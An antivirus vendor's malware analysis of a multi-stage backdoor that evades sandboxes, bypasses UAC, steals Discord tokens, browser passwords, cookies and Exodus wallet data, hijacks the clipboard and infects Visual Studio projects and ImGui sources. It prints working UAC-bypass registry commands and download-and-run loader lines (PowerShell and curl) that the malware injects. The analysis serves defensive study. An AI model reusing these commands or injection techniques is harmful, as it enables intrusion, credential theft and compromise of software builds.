SHA1:
- 8030c42dc54975c43f7625d874e7890f025dc9f4
Description
A phase 3 trojan in a multi-phase infection sequence that facilitates data theft, clipboard contents monitoring, backdoor deployment, rogue mining and infecting other files:
- Phase 1 — Trojan.DownLoader49.35384,
- Phase 2 — Trojan.DownLoader49.35687,
- Phase 3 — BackDoor.Siggen2.5906,
- Phase 4 — Trojan.Packed2.50953, Trojan.BtcMine.3956—phase 5 downloader.
The backdoor ensures that it will persist in the system and carries out its main malicious tasks.
Operation
Preparations
The backdoor checks whether it's being run in a sandbox. To accomplish this, it examines the username: it must not contain the string "voke9asd89a8sd8aw8d8awd8a", nor should it be "Srv". It then runs checks similar to those conducted by Trojan.DownLoader49.35687. It uses the CreateDXGIFactory() function to check the video adapter name, which must not contain any of the following:
- unknown,
- Microsoft Basic Render,
- NVIDIA GeForce RTX 3060 Ti.
Then it validates the username, which must not match any of the names listed below:
- george,
- Bruno,
- Abby,
- AMF,
- dx,
- John,
- elz,
- Admin.
If just one check fails, the trojan process ends. Then BackDoor.Siggen2.5906 employs the named pipe pipe\\ VccFramework to acquire the trojan ID and the domain name of the C2 server it will communicate with. Next, the backdoor creates a mutex synchronization object named Global\ PFNX_side {the first part of Pipe\VccFramework}.
Interaction with the C2 server
Having decrypted the domain name, the backdoor connects to the domain using the url {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry and downloads an encryption key for subsequently encrypting its communications with the server. If obtaining the key with this method proves impossible, the trojan uses dns.google.com/resolve to translate the domain name into the C2 IP address and converts it for use as an encryption key.
The trojan utilises XOR to encrypt the data it transmits to the server. Various strings and user IDs also get added to the data.
The trojan then connects to the domain using {C2 domain}/api/mnr/bobby31[.]php?type=fudrocketmod&security={the first part of pipe\VccFramework}. It obtains configuration data containing information about what its further actions should be: infect Win SDK or an Exodus crypto wallet, or modify registry entries related to WinRAR.
Persistence
The backdoor downloads the file "bungee.boo” from {C2 domain}/Stb/PokerFace/init[.]php?id=Mother and saves it to C:\ProgramData\bungee.boo. This file duplicates the phase 2 payload (Trojan.DownLoader49.35687). Then it replaces the following DLL files with it:
- Discord's profapi.dll
- “domain_actions.dll" in the "Domain Actions" folder and "well_known_domains.dll" in the "Well Known Domains" folder used by Microsoft Edge as well as the files manifest.json and manifest.fingerprint in these folders,
- C:\Windows\omadmapi.dll.
BackDoor.Siggen2.5906 can also modify the Windows registry so that opening a compressed file with WinRar.exe will trigger the execution of malicious code.
To carry out actions requiring administrator privileges, the backdoor employs a UAC bypass technique. The malware generates a .vbs script with a random digit-based name. The script contains an instruction that cannot be executed without administrator permissions. It then uses cmd.exe to run the following commands:
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
/c start /B ComputerDefaults.exe
Collecting Information
The backdoor collects the following system information:
- username,
- CPU,
- GPU,
- ram,
- Location
The information is relayed to {C2 domain}/api/mnr/bobby31 [.]php?security=Daytone&type=process along with the string “BrattSallatSecretPlace62|”.
Next, the trojan carries out its five malicious tasks: steal data, access clipboard content, engage in rogue mining, and infect other files.
Data theft
The trojan steals various information from the infected device, including: Discord tokens, Telegram files, passwords and cookies stored by browsers and Exodus crypto wallet data.
-
Discord tokens.
The trojan searches for Discord tokens in discord, discordptb, Lightcord, Opera, Opera GX, Brave Browser, Chrome SxS, Chrome, Chromium, Edge, and Yandex Browser. They are used to access user accounts without entering their respective logins and passwords. Encrypted Discord token strings start with the prefix dQw4w9WgXcQ: The trojan looks for tokens in .ldb and .log files found in the LevelDB directory, decrypts them and obtains the following information: the ID, email, phone number, the account verification status, and the availability of a premium subscription. The string “MndayFrOppsLX|” is then added to the stolen tokens, and they get sent to {C2 domain}/api/mnr/bobby31 [.]php?type=tknlogprcs&security=Daytone.
-
Telegram files.
The backdoor searches for the application folder Telegram Desktop\tdata on the device, archives the files, and sends them to {C2 domain}/api/mnr/bobby31 [.]php?type=APLATG&security=Daytone.
-
Passwords and cookie files.
The trojan sends a request to {C2 domain}/index[.]php?type=pexists&security=2. The response contains configuration information indicating whether the backdoor needs to copy passwords and/or cookie files. It decrypts passwords stored by Edge, Chrome, and Brave, adds the string “BabbChnnn64xaxz |” to them, and relays the data to {C2 domain}/api/mnr/bobby31[.]php?type=pssprc&security=Daytone. Cookie files from the web browsers Edge, Chrome, Brave, Mozilla and Opera also get decrypted and sent to the server.
Additionally, the trojan can start browsers with the parameters --headless --disable-gpu --no-sandbox --disable-dev-shm-usage--user-data-dir={path} --remote-debugging-port=0' in a hidden window.
It also downloads the file CCCWF.tmp (Trojan.PWS.Siggen5.33623) from {C2 domain}/Stb/PokerFace/init[.]php?id=Ppkvum into %TEMP%. This malicious code is injected into browser processes to decrypt passwords and save them to the brx file. The encryption keys, in turn, are saved to the crx file. Trojan execution logs are written to the file dll_debug.txt.
The trojan adds the string WalterXPrxxxzCokerPro37&|-|& to the decrypted passwords in the brx file and sends it, along with the stolen cookie files, to {C2 domain}/api/mnr/bobby31[.]php?type=ckiprc&security=Daytone.
-
Exodus data
The trojan looks for the Exodus crypto wallet folder on the infected device. If successful, it archives it and forwards the archive to {C2 domain}/api/mnr/bobby31[.]php?type=APLADEX&security=Daytone/.
In addition to stealing Exodus’s folders, the trojan modifies the crypto wallet. To accomplish this, it locates the app.asar file and replaces it with a file downloaded with curl from the URL found in balista [.]lol/Stb/PokerFace/RTApp [.]txt. In the replaced version, index.js (Trojan.Siggen32.44702) contains the unlock() function, which, when launched, intercepts the wallet recovery phrases and relays them to the attackers’ server.
Accessing clipboard contents
-
Bank Cards
The backdoor uses regular expressions to constantly monitor clipboard contents. If bank card information appears in the clipboard, the backdoor will add the string “AtummmSalllllxXX1522|” to the data and send it to {C2 domain}/api/mnr/bobby31[.]php?type=cclogentry&security=Daytone.
-
Cryptocurrency
The trojan sends a query containing the string “VooZXOOPPPS883321|” to {C2 domain}/api/mnr/bobby31[.]php?type=cryptosecr&security=Daytone The response will contain the addresses of attackers' crypto wallets. The trojan will use them to spoof the addresses it discovers in the clipboard.
Backdoor
The trojan downloads a new decryption key from {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry. Then it sends a request to {C2 domain}/api/mnr/bobby31[.]php?type=pingcnfr&security=Daytone and receives a list of actions to perform. The available commands for remote control over the device:
| exc | Use curl to download a specific file and run it |
| RVRS | Start Reverse Proxy |
| RUNCMD | Run a command via cmd |
| GETFILE | Upload the contents of a specific file to the C2 server |
| LISTDIR | Send a list of files in the system's specific directory to the C2 server |
| TROLL | Troll the user. The available trolling options include: earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer and more. |
Rogue mining
The trojan uses curl to download and run the file https://files[.]catbox [.]moe/lvh9j3 [.]bin. This file is a loader that runs the rogue mining app Trojan.BtcMine.3956.
Infecting files
The trojan sends a query to {C2 domain}/api/mnr/bobby31[.]php?type=stbcfg&security=Daytone&owr={the first part of pipe\VccFramework} and receives configuration information indicating which files to infect. Available options:
- imgui_impl_win32.cpp,
- .suo,
- .exe,
- winnetwk.h (Windows SDK),
- .vcxproj and .csproj.
To determine the paths to target files, the trojan examines the available disk drives and runs a command. For example, for drive A://
dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290
-
imgui_impl_win32.cpp. Trojan.Loader.3129
The trojan targets Dear ImGui, a popular GUI library for C++. The trojan adds two lines into a file: the first contains the payload, while the second launches it.
The resulting command is as follows:
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }"Now all of the applications that get built using the infected file imgui_impl_win32.cpp will contain malicious code and spread the infection to other computers.
-
.suo. Trojan.Loader.3138
This filename extension is associated with Microsoft Visual Studio. These files store user settings for specific projects. The trojan replaces an original file with its infected version, downloaded from the C2 server.
Opening the corresponding project in Visual Studio will also run this malicious code:
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files.nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close(); -
winnetwk.h. Trojan.Loader.3184
Windows SDK is Microsoft’s official toolkit for creating applications for Windows.
The trojan searches the registry section SOFTWARE\Microsoft\Windows Kits\Installed Roots for the value KitsRoot10. Once it has located Windows SDK’s installation folder, the trojan searches it for the file winnetwk.h, which is responsible for implementing networking features. The trojan adds malicious code into the file.
This ensures that all subsequently created apps relying on winnetwk.h will incorporate malicious code.
-
.exe
The trojan searches for suitable .exe files and injects its API and initterm initialisation functions into them. Then the file starts performing the functions of the phase 1 malware, a.k.a. Trojan.DownLoader49.35384.
-
.vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) and .csproj (Trojan.Loader.3126)
These are Visual Studio’s C++ and C# project files. The malware adds a pre-build event into the IDE to ensure that a malicious command is run automatically before any project build is created. Earlier versions introduced this code:
Now the code has become more complex and includes additional obfuscation features:
Executing the malicious command creates a .vbs script that, in turn, runs a PowerShell payload. The trojan sends queries using these URLs:
- youtu[.]be/akoxddx6lgc,
- steamcommunity[.]com/profiles/76561198737324192.
They point to a YouTube account page containing yet another base64-encoded URL. Decoding the URL provides the trojan with a C2 server address that it will use to download a payload similar to that of Trojan.DownLoader49.35687.
MITRE ATT@CK MATRIX
| Tactic | Technique |
|---|---|
| Executor |
Command and scripting interpreter (T1059) User execution (T1204) |
| Persistence |
Boot or Logon Autostart Execution (T1547) Compromise Host Software Binary (T1554) |
| Privilege Escalation |
Process Injection (T1055) Bypass User Account Control (T1548.002) |
| Stealth |
Obfuscated files or information (T1027) Masquerading (T1036) Virtualization/sandbox evasion (T1497) Bypass User Account Control (T1548.002) Process Injection (T1055) |
| Credential Access |
Steal Web Session Cookie (T1539) Credentials from Web Browsers (T1555.003) |
| Discovery |
Query Registry (T1012) System owner/user discovery (T1033) System information discovery (T1082) File and Directory Discovery (T1083) Virtualisation/sandbox evasion (T1497) Software Discovery (T1518) System Location Discovery (T1614) |
| Collection |
Data Staged (T1074) Clipboard Data (T1115) Archive Collected Data (T1560) |
| Command and Control |
Application layer protocol (T1071) Web Service (T1102) Ingress Tool Transfer (T1105) Encrypted Channel (T1573) |
| Exfiltration | Exfiltration over C2 Channel (T1041) |
More about Trojan.DownLoader49.35384
More about Trojan.DownLoader49.35687
More about Trojan.BtcMine.3956